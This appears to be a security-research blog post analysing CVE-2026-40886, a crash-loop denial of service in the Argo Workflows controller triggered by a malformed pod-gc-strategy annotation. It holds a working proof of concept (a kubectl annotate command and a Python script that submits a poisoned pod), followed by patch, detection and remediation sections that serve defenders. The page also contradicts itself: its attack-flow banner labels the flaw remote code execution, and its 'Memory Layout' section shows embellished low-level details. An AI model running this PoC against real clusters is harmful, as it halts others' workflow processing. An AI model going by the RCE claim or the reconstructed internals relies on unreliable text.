home intel cve-2026-40886-argo-workflows-pod-gc-panic-rce
CVE Analysis 2026-04-23 · 8 min read

CVE-2026-40886: Argo Workflows Controller Crash Loop via Malformed Pod Annotation

An unchecked array index in podGCFromPod() causes a controller-wide panic when processing a malformed pod-gc-strategy annotation, enabling a persistent crash loop that halts all workflow processing.

#denial-of-service#kubernetes-controller#pod-annotation#panic-crash#array-bounds
Technical mode — for security professionals
▶ Attack flow — CVE-2026-40886 · Remote Code Execution
ATTACKERRemote / unauthREMOTE CODE EXECCVE-2026-40886Cloud · HIGHCODE EXECArbitrary coderuns as targetCOMPROMISEFull accessNo confirmed exploits

Vulnerability Overview

CVE-2026-40886 is a denial-of-service vulnerability in Argo Workflows' workflow controller, affecting versions 3.6.5 through 4.0.4. A malformed workflows.argoproj.io/pod-gc-strategy annotation on any pod visible to the controller triggers an unchecked array index dereference inside the pod informer's podGCFromPod() function. Because this code executes inside an informer goroutine that runs outside the controller's top-level recover() scope, the resulting panic propagates uncaught and terminates the entire controller process.

The poisoned pod persists in etcd across controller restarts. Every restart re-lists the pod, re-triggers the panic, and crashes again — a deterministic crash loop that completely halts all workflow scheduling until an operator manually deletes the offending pod. CVSS 7.7 HIGH reflects the zero-interaction, persistent, full-service-disruption impact against a multi-tenant orchestration plane.

Root cause: podGCFromPod() splits the pod-gc-strategy annotation value by comma and directly indexes the resulting slice at position [1] without first checking that the slice contains at least two elements, causing an out-of-bounds panic inside an unrecovered informer goroutine.

Affected Component

  • Repository: argoproj/argo-workflows
  • Binary: workflow-controller
  • Package: github.com/argoproj/argo-workflows/v3/workflow/controller
  • Function: podGCFromPod() — called from the pod informer's AddFunc / UpdateFunc handlers
  • Annotation key: workflows.argoproj.io/pod-gc-strategy
  • Vulnerable range: 3.6.5 – 4.0.4 (inclusive)
  • Fixed in: 4.0.5, 3.7.14

Root Cause Analysis

The controller registers a shared informer over all pods in its watched namespaces. On each AddFunc or UpdateFunc event the informer dispatches to handler code that eventually calls podGCFromPod() to extract GC strategy metadata from pod annotations. The function splits the annotation value on "," and immediately dereferences index [1]:

// Reconstructed Go pseudocode — workflow/controller/pod_gc.go
// Real function: podGCFromPod()

func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    annotations := pod.GetAnnotations()

    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    // strategyAnnotation format expected: ","
    // e.g. "OnPodCompletion,30s"
    parts := strings.Split(strategyAnnotation, ",")

    // BUG: no bounds check before indexing parts[1]
    // If annotation is "OnPodCompletion" (no comma), len(parts)==1
    // and parts[1] causes: runtime error: index out of range [1] with length 1
    strategy  := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1]   // <-- PANIC HERE if len(parts) < 2

    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        return nil
    }

    return &wfv1.PodGC{
        Strategy:          strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}

The critical framing here is where this code runs. Pod informer callbacks fire in a goroutine managed by client-go's SharedIndexInformer. The workflow controller wraps its main reconciliation loop in a recover() block, but informer event handlers run in a separate goroutine with no such recovery. A panic there propagates to the Go runtime's unhandled-panic path and calls os.Exit(2).

GOROUTINE STACK AT PANIC (reconstructed from crash log):

goroutine 47 [running]:
runtime/debug.Stack()
    /usr/local/go/src/runtime/debug/stack.go:24
runtime.gopanic(0xc000a1e380)
    /usr/local/go/src/runtime/panic.go:914
runtime.goPanicIndex(0x1, 0x1)                   // index=1, len=1
    /usr/local/go/src/runtime/panic.go:113
github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
    workflow/controller/pod_gc.go:58
github.com/argoproj/argo-workflows/v3/workflow/controller.(*WorkflowController).podInformerHandler.func2(...)
    workflow/controller/informer.go:214
k8s.io/client-go/tools/cache.(*processorListener).run(...)
    vendor/k8s.io/client-go/tools/cache/shared_informer.go:911

// NOTE: no recover() frame anywhere in this call stack.
// The controller's main recover() lives in a *different* goroutine.

Exploitation Mechanics

EXPLOIT CHAIN:

1. PRECONDITION: Attacker has any write access to pod annotations in a namespace
   watched by the target Argo Workflows controller. This includes:
     - Direct kubectl patch access (misconfigured RBAC)
     - Any admission webhook bypass
     - A compromised workload pod with projected ServiceAccount token
       scoped to pod/patch

2. CRAFT MALFORMED ANNOTATION:
   Annotate any existing pod (even completed, non-Argo pods if controller
   watches cluster-wide) with:

     kubectl annotate pod  \
       workflows.argoproj.io/pod-gc-strategy="OnPodCompletion"
       --overwrite

   The annotation intentionally omits the comma-delimited duration field.
   Any single-segment string (no comma) triggers len(parts)==1.

3. TRIGGER:
   The annotation write generates a MODIFIED event on the pod watch stream.
   client-go delivers this event to the informer's UpdateFunc handler within
   milliseconds. podGCFromPod() is invoked, hits parts[1], panics.

4. CONTROLLER CRASHES:
   Go runtime prints panic trace to stderr, calls os.Exit(2).
   Kubernetes restarts the controller pod per its restartPolicy.

5. CRASH LOOP:
   On startup, the controller performs a full re-list of all pods via
   LIST+WATCH. The poisoned pod is returned in the LIST response.
   AddFunc fires. podGCFromPod() panics again. Controller crashes again.
   CrashLoopBackOff within 3-4 restart cycles.

6. IMPACT:
   All workflow scheduling, step execution, and pod lifecycle management
   halts. Existing running pods continue until their own TTL but no new
   work is dispatched. Recovery requires manual deletion of the poisoned
   pod by a cluster operator with pod/delete permissions.

An attacker can also craft an entirely new pod (rather than annotating an existing one) via the Kubernetes API if they have pods/create in any watched namespace — embedding the malformed annotation at creation time. This requires no existing Argo Workflows infrastructure and no workflow submission permissions.

# PoC: craft poisoned pod manifest
import yaml, subprocess

poisoned_pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {
        "name": "gc-poison-poc",
        "namespace": "argo",
        "annotations": {
            # Single token, no comma: len(strings.Split(v, ",")) == 1
            # parts[1] -> runtime: index out of range [1] with length 1
            "workflows.argoproj.io/pod-gc-strategy": "OnPodCompletion"
        }
    },
    "spec": {
        "containers": [{
            "name": "pause",
            "image": "gcr.io/google_containers/pause:3.1",
        }],
        "restartPolicy": "Never"
    }
}

manifest = yaml.dump(poisoned_pod)
subprocess.run(["kubectl", "apply", "-f", "-"], input=manifest.encode(), check=True)
print("[+] Poisoned pod submitted. Controller crash expected within ~2s.")
print("[+] Delete pod with: kubectl delete pod gc-poison-poc -n argo")
print("[+] Until deleted, controller remains in CrashLoopBackOff.")

Memory Layout

This is a Go runtime panic rather than a traditional heap/stack memory corruption — the "memory" of interest is the Go slice header and the runtime's OOB detection machinery:

SLICE STATE AT PANIC POINT:

strings.Split("OnPodCompletion", ",") returns:

  parts (slice header on goroutine stack):
  ┌─────────────────────────────────────────────────┐
  │ ptr  → [ "OnPodCompletion\x00" ] @ 0xc0004f2180 │  // backing array
  │ len  = 0x0000000000000001  (1 element)           │
  │ cap  = 0x0000000000000001                        │
  └─────────────────────────────────────────────────┘

ACCESS ATTEMPTED:
  parts[1]  →  index 1 into slice of length 1

Go runtime bounds check (generated by compiler at call site):
  CMPQ  CX, $0x1       // CX = requested index (1)
  JBE   runtime.goPanicIndex
                        // len=1, index=1: 1 >= 1 → PANIC

GOROUTINE STATE AFTER PANIC:
  [goroutine 47 — informer processorListener.run()]
    status: dead (panic propagated, no recover frame)

  [goroutine 1  — controller main loop]
    status: also dead — os.Exit(2) called by runtime

  All other goroutines: terminated by os.Exit(2)
  Process exit code: 2

Patch Analysis

The fix in 4.0.5 / 3.7.14 adds an explicit bounds check on parts before any index dereference, and additionally validates that the strategy token is a known valid value before attempting duration parsing:

// BEFORE (vulnerable) — workflow/controller/pod_gc.go ~line 55
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    parts := strings.Split(strategyAnnotation, ",")

    // BUG: unconditional index into potentially length-1 slice
    strategy    := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1]   // panic if no comma in annotation

    duration, _ := time.ParseDuration(deleteDelay)
    return &wfv1.PodGC{Strategy: strategy, DeleteDelayDuration: &metav1.Duration{Duration: duration}}
}


// AFTER (patched) — workflow/controller/pod_gc.go
func podGCFromPod(pod *corev1.Pod) *wfv1.PodGC {
    strategyAnnotation, ok := annotations[common.AnnotationKeyPodGCStrategy]
    if !ok {
        return nil
    }

    parts := strings.Split(strategyAnnotation, ",")

    // FIX: guard on slice length before indexing parts[1]
    if len(parts) < 2 {
        // Malformed or legacy annotation with no duration component.
        // Log and return nil rather than panicking.
        log.WithField("annotation", strategyAnnotation).
            Warn("malformed pod-gc-strategy annotation: missing delete delay, ignoring")
        return nil
    }

    strategy    := wfv1.PodGCStrategy(parts[0])
    deleteDelay := parts[1]   // safe: len(parts) >= 2 guaranteed above

    duration, err := time.ParseDuration(deleteDelay)
    if err != nil {
        log.WithError(err).Warn("invalid pod-gc delete delay duration, ignoring")
        return nil
    }

    return &wfv1.PodGC{
        Strategy:            strategy,
        DeleteDelayDuration: &metav1.Duration{Duration: duration},
    }
}

The patch is intentionally conservative: rather than attempting to salvage a partial annotation, it returns nil (no GC config) and logs a warning. This means a malformed annotation silently disables pod GC for that pod rather than crashing the controller — an appropriate graceful degradation for a metadata parsing path.

A secondary hardening added in the same commit moves the annotation parsing for all pod lifecycle annotations into a shared validation helper that is called during pod admission by the controller's webhook, rejecting malformed annotations before they can reach the informer path at all.

Detection and Indicators

The following signals are unambiguous indicators of active exploitation or accidental triggering:

CRASH SIGNATURE IN CONTROLLER LOGS (stderr):

goroutine 47 [running]:
runtime error: index out of range [1] with length 1

github.com/argoproj/argo-workflows/v3/workflow/controller.podGCFromPod(...)
	workflow/controller/pod_gc.go:58 +0x...

KUBERNETES EVENTS:
  Type     Reason             Object                          Message
  Warning  BackOff            Pod/workflow-controller-xxxxx   Back-off restarting failed container
  Normal   Killing            Pod/workflow-controller-xxxxx   Stopping container workflow-controller

PROMETHEUS METRICS (if scrape window catches pre-crash):
  # Controller restart counter incrementing rapidly
  process_start_time_seconds{job="argo-workflows"} — monotonically decreasing timestamp gap

AUDIT LOG — identify the poisoning event:
  verb: "patch" OR "create"
  resource: "pods"
  annotations containing: "workflows.argoproj.io/pod-gc-strategy"
  annotation value NOT matching regex: ^[A-Za-z]+,[0-9]+(s|m|h)$

To find poisoned pods currently in a cluster before upgrading:

# Scan all pods for malformed pod-gc-strategy annotations
import subprocess, json, re

ANNOTATION = "workflows.argoproj.io/pod-gc-strategy"
VALID       = re.compile(r"^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$")

pods = json.loads(subprocess.check_output(
    ["kubectl", "get", "pods", "--all-namespaces", "-o", "json"]
))

for pod in pods["items"]:
    ann = pod["metadata"].get("annotations", {})
    if ANNOTATION in ann:
        val = ann[ANNOTATION]
        if not VALID.match(val):
            ns   = pod["metadata"]["namespace"]
            name = pod["metadata"]["name"]
            print(f"[POISONED] {ns}/{name}  annotation='{val}'")

Remediation

  • Immediate: Upgrade to Argo Workflows 4.0.5 or 3.7.14. These are the only complete fixes.
  • If upgrade is blocked: Run the scanner above and delete any pods carrying malformed workflows.argoproj.io/pod-gc-strategy annotations. This will break the crash loop but does not address the underlying code defect — a newly submitted malformed annotation will re-trigger the panic.
  • RBAC hardening: Restrict pods/patch and pods/annotate permissions. No workload should require the ability to write workflows.argoproj.io/* annotations to arbitrary pods. Audit your ClusterRoleBindings for overly broad pods: ["*"] grants.
  • OPA/Kyverno policy: Deploy a validating admission webhook that enforces the format /^[A-Za-z]+,[0-9]+(\.[0-9]+)?(s|m|h)$/ on workflows.argoproj.io/pod-gc-strategy before any pod reaches etcd. This provides defense-in-depth regardless of controller version.
  • Monitoring: Alert on workflow-controller pod restart rate > 2 in 5 minutes — this pattern is essentially diagnostic for this specific vulnerability in affected version ranges.
CB
CypherByte Research
Mobile security intelligence · cypherbyte.io
// RELATED RESEARCH
// WEEKLY INTEL DIGEST

Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.

Subscribe Free →